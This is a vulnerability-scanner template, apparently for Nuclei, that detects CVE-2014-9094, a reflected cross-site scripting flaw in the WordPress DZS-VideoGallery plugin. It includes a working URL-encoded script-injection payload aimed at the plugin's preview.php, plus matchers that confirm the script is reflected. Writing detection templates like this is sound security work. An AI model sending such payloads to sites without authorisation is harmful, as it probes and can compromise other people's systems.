30 lines
666 B
YAML
30 lines
666 B
YAML
|
id: CVE-2014-9094
|
||
|
|
||
|
info:
|
||
|
name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
|
||
|
author: daffainfo
|
||
|
severity: medium
|
||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
|
||
|
tags: cve,2014,wordpress,xss
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- "<script>alert(1)</script>"
|
||
|
part: body
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- text/html
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|